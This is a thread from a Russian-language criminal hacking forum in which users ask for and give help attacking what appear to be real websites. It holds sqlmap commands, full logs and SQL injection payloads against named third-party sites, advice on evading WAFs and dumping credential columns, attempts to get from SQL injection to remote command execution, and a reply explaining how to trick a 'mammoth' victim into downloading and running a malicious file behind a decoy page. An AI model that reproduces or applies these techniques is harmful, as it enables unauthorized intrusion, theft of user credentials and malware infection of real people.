• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Подскажите пожалуйста . не пойму что срабатывает. потому что там 18 бд и половина из них типа такого "AAAAA??AA????? "
курент бд вот , вроде как вывело. но опять же таблицы такого плана, ну и поск тоже самое дает
____________________________________
вот сама скуля с акунетикса

GET https://site.com.com/index.php?color=(*)/*'+(*)+'"%2B(*)%2B"*/&path=742&route=product/category HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dresswithmodesty.com/
Cookie: PHPSESSID=no0mdvt8hg478famqhlmnnjet6; language=en; tmr_vid_5756=1; subscriber_popup_discard=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Host: dresswithmodesty.com
Connection: Keep-alive

тамперы разные пробовал, ватваф не определяет WAF

команда на данном процессе была вот

sqlmap -r /root/Downloads/ro.txt --random-agent --dbms=mysql --level 5 --risk 3 --timeout 100 --technique=B --time-sec=2 --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields --tor --tor-port=9150 --tor-type=SOCKS5 --string=Fatal --ignore-code=504 --no-cast --current-db



[13:47:25] [INFO] testing if the provided string is within the target URL page content
[13:47:25] [WARNING] you provided 'Fatal' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #4* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-6535' OR 5757=5757-- PkcE)+"/&path=742&route=product/category

Parameter: #3* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-5430' OR 6483=6483-- UbBD)+'"+()+"/&path=742&route=product/category

Parameter: #5* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-1417' OR 9832=9832-- PwDS/&path=742&route=product/category

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site:443/index.php?color=-6267' OR 3837=3837-- EbgE)/'+()+'"+()+"/&path=742&route=product/category

Parameter: #2* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-8130' OR 7742=7742-- Fgpw'+()+'"+()+"/&path=742&route=product/category
---
[13:47:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #1*, type: Single quoted string (default)
[1] place: URI, parameter: #2*, type: Single quoted string
[2] place: URI, parameter: #3*, type: Single quoted string
[3] place: URI, parameter: #4*, type: Single quoted string
[4] place: URI, parameter: #5*, type: Single quoted string
[q] Quit
> 3
[13:47:30] [INFO] testing MySQL
[13:47:39] [INFO] confirming MySQL
[13:48:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, Plesk
back-end DBMS: MySQL >= 5.0.0 (Aurora fork)
[13:48:02] [INFO] fetching tables for database: 'wsf'
[13:48:02] [INFO] fetching number of tables for database 'wsf'
[13:48:02] [INFO] retrieved: 260
[13:49:48] [INFO] retrieving the length of query output
[13:49:48] [INFO] retrieved: 6
[13:50:28] [INFO] retrieved: ______
[13:51:55] [WARNING] unexpected HTTP code '504' detected. Will use (extra) validation step in similar cases
[13:52:40] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[13:56:14] [INFO] retrieved: Ot_keq
[13:56:14] [INFO] retrieving the length of query output
[13:56:14] [INFO] retrieved: 14
[14:11:02] [INFO] retrieved: AAAAA??AA?????
[14:11:02] [INFO] retrieving the length of query output
[14:11:02] [INFO] retrieved:
[14:15:06] [INFO] retrieved:
[14:18:09] [INFO] retrieving the length of query output
[14:18:09] [INFO] retrieved: 0
[14:21:05] [INFO] retrieving the length of query output
[14:21:05] [INFO] retrieved: 9
[14:29:42] [INFO] retrieved: AAAA?A?a?
[14:29:42] [INFO] retrieving the length of query output
[14:29:42] [INFO] retrieved:
[14:33:46] [INFO] retrieved: ffiliate_activity
[14:50:02] [INFO] retrieving the length of query output
[14:50:02] [INFO] retrieved: 23
[15:06:09] [INFO] retrieved: AAAA?aA?????????????___ 20/23 (86%)

СПАСИБО ВСЕМ ЗАРАНЕЕ!!!!
 
Всех приветствуюбвсех с наступающим! Подскажите пожалуйста мб кто то знает какие либо расширения для хрома/оперы чтоб посмотреть какие отпечатки собирает сайт ?
 
Как сдампить базу? Ваф обрывает

Мой запрос ///
sqlmap -u "http://сайт.au:80/store-directory.php?showv=&f[]=2&b[]=-3487*&so=&show=30" --technique B --level=5 --risk=3 --random-agent --dbms=mysql -dbs -v3 --tamper "modsecurityzeroversioned.py"
/// Нашел базу, но ваф обрубил соединение. Как можно обойти?
попробуй спарсить не базу целиком, а просто нужные тебе колонки указав их так -C username,password
у самого была анологичная проблема, решилась таким вот способом
 
Помогите понять как найденные в Burp Suit уязвимости использовать в sqlmap? как правильно задавать линк, потому что обычно линки шли как url/id=1*, а что делать с такими? (первый cookies)

GET /2022/08/09/text/ HTTP/2
Host: XXX.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: _ga_LH1ZCQZFF3=GS1.1.1671806961.1.0.1671806961.0.0.0; _ga=GA1.2.91588933.1671806962; _gid=GA1.2.981411700.1671806964; _ym_uid=1671806964925287463; _ym_d=1671806964; _gat_gtag_UA_171824903_1=1; _ym_isad=2; _ym_visorc=w42403044'%20or%20'8577'%3d'8577
Upgrade-Insecure-Requests: 1
Referer: https://XXX.com/author/admin/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="108", "Chromium";v="108"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0

GET /2021/01/21/text/?161453812%20or%201032%3d01032--%20=1 HTTP/2
Host: XXX.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: https://xxx.com/post-sitemap.xml
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="108", "Chromium";v="108"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
 
Помогите понять как найденные в Burp Suit уязвимости использовать в sqlmap? как правильно задавать линк, потому что обычно линки шли как url/id=1*, а что делать с такими? (первый cookies)

GET /2022/08/09/text/ HTTP/2
Host: XXX.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: _ga_LH1ZCQZFF3=GS1.1.1671806961.1.0.1671806961.0.0.0; _ga=GA1.2.91588933.1671806962; _gid=GA1.2.981411700.1671806964; _ym_uid=1671806964925287463; _ym_d=1671806964; _gat_gtag_UA_171824903_1=1; _ym_isad=2; _ym_visorc=w42403044'%20or%20'8577'%3d'8577
Upgrade-Insecure-Requests: 1
Referer: https://XXX.com/author/admin/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="108", "Chromium";v="108"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
Сохрани в файл, например sql.txt (можно без расширения, просто sql). Удали в файле из строки в кукис _ym_visorc=w42403044'%20or%20'8577'%3d'8577 вот это '%20or%20'8577'%3d'8577 и вместо этого пэйлоада поставь * . Должно получиться _ym_visorc=w42403044*
В sqlmap:
sqlmap> -r /path/to/sql.txt --force-ssl --level=4 --risk=3 --dbms=mysql -o --random-agent -v 3 , в общем все стандартные кеи, которые используешь, указывай дальше (ну и dbms предполагаемую, не обяз. там будет mysql). Потом просто на вопрос sqlmap " Process it * ?" (как то так он спросит) отвечай Y. Или можно не ставить звездочку, а явно указать параметр -p "_ym_visorc"


GET /2021/01/21/text/?161453812%20or%201032%3d01032--%20=1 HTTP/2
Host: XXX.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Referer: https://xxx.com/post-sitemap.xml
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="108", "Chromium";v="108"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
Точно так же. Вместо
%20or%201032%3d01032--%20
звездочку, или можно не сохранять в файл, а сразу sqlmap> -u https://site.com/2021/01/21/text/?161453812*=1 -ключи.
('=1' тут вообще не нужно, при проверке мап сам подставит, где необходимо)
 
Всех приветствуюбвсех с наступающим! Подскажите пожалуйста мб кто то знает какие либо расширения для хрома/оперы чтоб посмотреть какие отпечатки собирает сайт ?

Canvas Fingerprint Defender - для хрома/оперы​


opensource - на гите расширения
 
Сохрани в файл, например sql.txt (можно без расширения, просто sql). Удали в файле из строки в кукис _ym_visorc=w42403044'%20or%20'8577'%3d'8577 вот это '%20or%20'8577'%3d'8577 и вместо этого пэйлоада поставь * . Должно получиться _ym_visorc=w42403044*
В sqlmap:
sqlmap> -r /path/to/sql.txt --force-ssl --level=4 --risk=3 --dbms=mysql -o --random-agent -v 3 , в общем все стандартные кеи, которые используешь, указывай дальше (ну и dbms предполагаемую, не обяз. там будет mysql). Потом просто на вопрос sqlmap " Process it * ?" (как то так он спросит) отвечай Y. Или можно не ставить звездочку, а явно указать параметр -p "_ym_visorc"



Точно так же. Вместо

звездочку, или можно не сохранять в файл, а сразу sqlmap> -u https://site.com/2021/01/21/text/?161453812*=1 -ключи.
('=1' тут вообще не нужно, при проверке мап сам подставит, где необходимо)
спасибо большое
 
Подскажите я новичёк ! Есть ли вариант прикрепить не большой файл (+- 10кв ) к сылке? Например я скидываю ссылку на статью, человек по ней переходит и видыт статью но при этом ему установился мой файл. Подскажите как это сделать ? Или статейки на эту тему. Спасибо
 
Подскажите я новичёк ! Есть ли вариант прикрепить не большой файл (+- 10кв ) к сылке? Например я скидываю ссылку на статью, человек по ней переходит и видыт статью но при этом ему установился мой файл. Подскажите как это сделать ? Или статейки на эту тему. Спасибо
Прямо к ссылке файл не прикрепишь. Из того, что сразу в голову приходит, можешь это сделать через свою прокладку. Кидаешь линк на нее, там с помощью js инициируешь скачивание и в соседней вкладке открываешь тот самый линк со статьей для отвода глаз.
Но в этом случае файл только скачается, а чтобы его запустить, это тебе эксплойт под браузер нужен с RCE. Но под последние версии браузеров такие эксплойты если есть, то стоят как крыло от самолета, еще и найти надо где его купить)
Поэтому тебе надо заставить мамонта самого запустить файл. Как вариант, можно открывать линк не со статьей, а с софтом каким-то белым. Легенду уж сам придумаешь. А на прокладке скачивание запускать с задержкой, чтобы соседняя страница успела прогрузиться. Так есть вероятность, что жертва подумает, что скачивание идет с этой самой белой страницы, типа началось автоматически при заходе. Ну мало ли, настолько лохом окажется) В общем, имхо, надо куда-то в эту сторону смотреть.
 
Последнее редактирование:
Вывожу таблицу юзеров

Table: bassmolletaccounts
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| Active | tinyint(4) |
| Email | varchar(200) |
| IDX | int(11) |
| Password | blob |
+----------+--------------+

И получаю такие пассы:
___>y__M?
__N_t__??
__M>_t__?
Попробовал с --hex получаю такое:
\x0b\x8c\x17\ncz\xa8
\x0b\x8c\x1f6\
Как вывести пассы в нормально виде, что можете подсказать?
скуля: Boolean-based blind
 
Вопрос по обходу фильтра. Уже пару раз встречал, что на сайтах поиск реализован так:
Results For "qwe"
Кто-то знает как выйти из кавычек?
Полезные нагрузки не позволяют выйти из кавчек
Results For "12' ORDER BY 1,2,3,4--"
 
Вопрос по обходу фильтра. Уже пару раз встречал, что на сайтах поиск реализован так:
Results For "qwe"
Кто-то знает как выйти из кавычек?
Полезные нагрузки не позволяют выйти из кавчек
Results For "12' ORDER BY 1,2,3,4--"
Попробуй вместо пробелов использовать /**/ у меня в подобных ситуациях с иньекцией в поиске срабатывало
 
Подскажите, пожалуйста
Есть таргет, есть sqli всех видов, вообще без проблем, юзер является DBA и имеет все права. Сайт лежит в пути /home/ubuntu/*target*. Записать файл туда нет прав, почему-то. Можно на изи читать файлы /etc/*. Записать файл получается только по пути /tmp. Через мапу --os-shell коннектится без проблем, но любая команда "No Output", пробовал слепые команды для подтверждения - не работает. Читал мануал по sys_exec, пробовал вручную, тоже не выходит. В силу неопытности, не могу выполнить sqli to rce никак. Подскажите в какую сторону копать, заранее благодарю!
 
Подскажите, есть ли метод обхода ограничений привелегий со стороны клиента на web ресурсе? Может xss или еще как то... Если на стороне клиента без вариантов, то какой самый эффективный способ сделать иначе?
 
Подскажите, есть ли метод обхода ограничений привелегий со стороны клиента на web ресурсе? Может xss или еще как то... Если на стороне клиента без вариантов, то какой самый эффективный способ сделать иначе?
write in english
 
Всем привет. Есть 1000 линков, гипотетически подверженных sql injection ( по типу example.com/?p=100, ?page_id=11 ) . Если бурпом каждый проверять, то долго будет. Для автоматизации данного процесса есть скрипты готовые или самому писать нужно?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх